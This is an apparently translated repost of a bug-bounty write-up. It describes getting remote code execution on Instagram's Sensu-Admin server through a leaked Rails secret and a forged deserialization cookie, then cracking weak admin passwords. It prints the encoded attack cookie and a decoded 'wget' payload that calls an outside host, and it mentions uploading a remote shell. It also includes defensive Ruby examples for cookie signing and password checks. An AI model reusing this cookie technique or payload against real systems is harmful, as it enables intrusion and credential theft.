Source: myhack58 (www.myhack58.com), author 佚名 (anonymous), id MYHACK58:62201673626
Published: Apr 14, 2016 - 12:00 a.m.

From a deserialization vulnerability to taking over the empire: the million-dollar Instagram vulnerability


In 2012, Bloomberg published a well-known article about Facebook's white-hat bounty program, in which Facebook said that if someone found a vulnerability worth a million dollars, they would pay that amount in full. Before I begin, I owe you an apology for the click-bait title, but that earlier Facebook statement is important background for this article. After some attempts and effort, I did find a vulnerability in Instagram that could be worth a million dollars: it could be used to obtain Instagram's source code, photos, SSL certificates and more.
0x01 A great lead
Last year I did some small tests against Facebook's security and had some results, so I became very interested in testing the security of Facebook's overall infrastructure in depth. I also have to thank my employer for letting me look for other companies' vulnerabilities outside working hours; without that, this article would not exist. A while ago a friend mentioned that he had been testing the security of Instagram's systems, which are an important part of Facebook's bug bounty program. He had found a vulnerability in a Ruby server at Instagram (https://sensu.instagram.com) and had already submitted it to Facebook's vulnerability response team, who classified it as "internal admin panel exposed externally". In his report to Facebook he mentioned that the backend might have a Ruby password-reset vulnerability that an attacker could use to log in, but he had not confirmed that guess. The first time I saw the details, I thought of CVE-2013-3221 (http://ronin-ruby.github.io/blog/2013/01/28/new-rails-poc.html). Since he had already submitted the bug, my friend privately asked me to help him see whether this lead could be taken further, to expand the vulnerability and reach Instagram's core data.
0x02 Ruby (Rails) remote command execution
Based on the details in my friend's report, I tried to find a way to reset the password of this Ruby application. The preliminary results were not promising: the login page did not accept the value "0" as a password, and I did not know how to trigger a password-reset email. I found that this backend was probably built on the open-source Sensu management system, so I googled the keyword "Sensu-Admin", but found nothing. It looked as though my friend's guess was wrong.
The surprise came when I found the application's source code on GitHub. In the project directory there was a secret_token.rb that leaked the Rails secret key. My first reaction was that Facebook's developers could not be careless enough to deploy their own backend without changing that key. But I wanted to try anyway, because if it worked I could forge session cookies and log in to the backend. And as the author of the CVE-2013-3221 write-up I mentioned (http://ronin-ruby.github.io/blog/2013/01/28/new-rails-poc.html) pointed out, cookies are not the only thing that can be forged: because of the deserialization vulnerability in Ruby on Rails, an attacker can go straight to remote code execution.
Before testing the deserialization vulnerability against Instagram's live system, I first tested it locally, using the following test framework: https://github.com/charliesome/charlie.bz/blob/master/posts/rails-3.2.10-remote-code-execution.md
The results were surprisingly good: I reproduced the vulnerability locally. Then, following the same steps with the key just found on GitHub, I sent the following cookie to Instagram's Sensu-Admin backend server:
_sensu-admin_session=BAhvOkBBY3RpdmVTdXBwb3J0OjpEZXByzwnhdglvbjo6rgvwcmvjyxrlzeluc3rhbmnlvmfyawfibgvqcm94eqc6dkbpbnn0yw5jzw86cevsqgy6cubzcmnjikfldmfskcdzexn0zw0oindnzxqgahr0cdovl2v4zmlsdhjhdgvklmnvbs90zxn0lwluc3rhz3jhbsipjykgogzfvdomqg1ldghvzdolcmvzdwx0–92c614a28526d03a1a31576bf4bb4c6026ef5e1f
With this carefully constructed cookie, Instagram's server executed the code I sent. Decoded, the payload was:
"wget http://exfiltrated.com/test-instagram"
So I set up a listening port, uploaded a remote shell, and got the following result:
[screenshot]
After successfully getting Instagram's server to run the command I sent, I reported the bug to the Facebook team. In my report I noted:
Facebook's "Sensu-Admin" service was using a private key that had been disclosed on the internet.
sensu.instagram.com was running Rails 3.x, a version with a remote code execution vulnerability.
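As an added illustration (not code from the article, from Sensu, or from Rails) of why a secret_token committed to a public repository is enough to mint valid session cookies, here is a minimal signed-cookie routine in Ruby. It assumes the Rails 3 cookie layout of a base64 payload, a "--" separator and a hex HMAC-SHA1 over the payload, but serializes the session with JSON instead of Marshal, so a forged cookie can fake session data yet cannot trigger code execution on load; the module name, the constructed secret and the session contents are my own.

```ruby
# Added example: Rails-3-style signed session cookie, built and verified.
# Whoever holds +secret+ can call sign() and produce a cookie that
# verify_and_load() accepts, which is the whole problem with a leaked
# secret_token.rb. Using JSON (assumption here) instead of Marshal means
# the worst case is a forged session, not deserialization-driven RCE.
require 'openssl'
require 'base64'
require 'json'

module SessionCookie
  SEPARATOR = '--'

  # Rails 3 cookie stores sign with HMAC-SHA1 and hex-encode the tag.
  def self.digest(secret, payload)
    OpenSSL::HMAC.hexdigest(OpenSSL::Digest.new('SHA1'), secret, payload)
  end

  # Constant-time comparison so a bad tag is not rejected byte by byte.
  def self.secure_compare(a, b)
    return false unless a.bytesize == b.bytesize
    a.bytes.zip(b.bytes).inject(0) { |acc, (x, y)| acc | (x ^ y) }.zero?
  end

  # "base64(json)--hexhmac". Anyone with the secret can do this.
  def self.sign(session_hash, secret)
    payload = Base64.strict_encode64(JSON.generate(session_hash))
    "#{payload}#{SEPARATOR}#{digest(secret, payload)}"
  end

  # Verify the tag first, deserialize second; nil on any failure.
  def self.verify_and_load(cookie, secret)
    payload, mac = cookie.to_s.split(SEPARATOR, 2)
    return nil if payload.nil? || mac.nil?
    return nil unless secure_compare(mac, digest(secret, payload))
    data = JSON.parse(Base64.strict_decode64(payload))
    data.is_a?(Hash) ? data : nil
  rescue ArgumentError, JSON::ParserError
    nil
  end
end

if __FILE__ == $PROGRAM_NAME
  leaked = 'constructed-secret-that-was-committed-to-git' # constructed
  legit  = SessionCookie.sign({ 'user_id' => 7 }, leaked)
  forged = SessionCookie.sign({ 'user_id' => 1, 'admin' => true }, leaked)
  puts "legit  -> #{SessionCookie.verify_and_load(legit, leaked).inspect}"
  puts "forged -> #{SessionCookie.verify_and_load(forged, leaked).inspect}"
  puts "wrong secret -> #{SessionCookie.verify_and_load(legit, 'rotated').inspect}"
end
```

The verifier accepts the forged cookie as readily as the legitimate one because both carry a correct HMAC; the only defence against a leaked secret is rotating it. Keeping the serializer free of Marshal limits what a forged cookie can do, but does not restore session integrity.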
0x03 Deadly weak passwords
Frankly, finding a remote code execution bug was not the exciting part for me. But I wanted to confirm that I was still within the scope of Facebook's bug bounty program, so I went and read the program's rules. They say that although Facebook objects to penetration testing that might damage its systems, the response team is very interested when a tester can show that more core data is reachable. Reading that, I concluded that my testing was within what Facebook permits.
As mentioned in the previous section, although I had succeeded in making Facebook's server execute remote code and had obtained a shell, I had not reached the backend's UI. As it happened, the user data for this backend was stored in a Postgres DB on the same server, so it was easy to pull about 60 account usernames and passwords from it. Sadly, the passwords were encrypted. Just as I was feeling sick about how to decrypt them, good news came: in a short time I cracked 12 weak passwords, including "changeme", "password" and "instagram". Good grief, blatantly weak passwords. So I successfully logged in to the https://sensu.instagram.com backend interface; here is a screenshot:
[screenshot]
Because Facebook strongly objects to testing that could damage its systems, I just took a screenshot and left, then submitted this as a new vulnerability to Facebook's emergency response team.
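The admin passwords recovered above ("changeme", "password", "instagram") are the kind a set-password check should refuse outright. As an added example, not code from the article or from Sensu, here is a Ruby routine that rejects denylisted and product-named passwords and stores accepted ones with salted PBKDF2-SHA256; the denylist, iteration count, minimum length and sample inputs are my own choices.

```ruby
# Added example: refuse weak admin passwords and hash the rest slowly.
# DENYLIST, MIN_LENGTH and ITERATIONS are constructed values for this
# demo, not settings from the article or from Sensu.
require 'openssl'
require 'securerandom'

module AdminPasswords
  DENYLIST   = %w[changeme password instagram admin sensu 123456].freeze
  MIN_LENGTH = 12
  ITERATIONS = 200_000
  KEY_LEN    = 32

  # Returns nil when the password is acceptable, otherwise a reason.
  # +context_words+ are site-specific terms (host names, product names)
  # that should never appear in a password for that system.
  def self.weakness(password, context_words = [])
    pw = password.to_s.downcase
    return 'on denylist' if DENYLIST.include?(pw)
    # Catch padded variants such as "password1" or "Instagram2016".
    letters = pw.gsub(/[^a-z]/, '')
    return 'denylisted word with padding' if DENYLIST.include?(letters)
    return 'too short' if pw.length < MIN_LENGTH
    if context_words.any? { |w| pw.include?(w.to_s.downcase) }
      return 'contains product/host name'
    end
    nil
  end

  # "pbkdf2-sha256$iterations$base64(salt)$base64(dk)"
  def self.hash_password(password, salt = SecureRandom.random_bytes(16))
    dk = OpenSSL::PKCS5.pbkdf2_hmac(password, salt, ITERATIONS, KEY_LEN, 'sha256')
    "pbkdf2-sha256$#{ITERATIONS}$#{[salt].pack('m0')}$#{[dk].pack('m0')}"
  end

  def self.verify_password(password, stored)
    _alg, iters, salt_b64, dk_b64 = stored.split('$', 4)
    return false if dk_b64.nil?
    salt     = salt_b64.unpack1('m0')
    expected = dk_b64.unpack1('m0')
    dk = OpenSSL::PKCS5.pbkdf2_hmac(password, salt, iters.to_i, expected.bytesize, 'sha256')
    # Constant-time comparison of the derived keys.
    dk.bytes.zip(expected.bytes).inject(0) { |acc, (x, y)| acc | (x ^ y) }.zero?
  end

  # Convenience for a set-password flow: reason string or the stored hash.
  def self.set_password(password, context_words = [])
    reason = weakness(password, context_words)
    reason ? [:rejected, reason] : [:ok, hash_password(password)]
  end
end

if __FILE__ == $PROGRAM_NAME
  # Constructed sample inputs, including the three from the article.
  %w[changeme password instagram Instagram2016 sensu-admin-2016-x].each do |pw|
    puts "#{pw.ljust(20)} -> #{AdminPasswords.set_password(pw, ['sensu']).first}"
  end
  status, stored = AdminPasswords.set_password('correct horse battery staple')
  puts "#{status}: #{stored}"
end
```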
0x04 Penetrating the internal network
In my first bug report email, I asked the Facebook team whether I could be authorized to penetrate the internal network. The Sensu-Admin server was running on EC2, and its /etc/hosts file listed about 1400 systems large and small, so there was a very good chance I could get into Instagram's internal network.
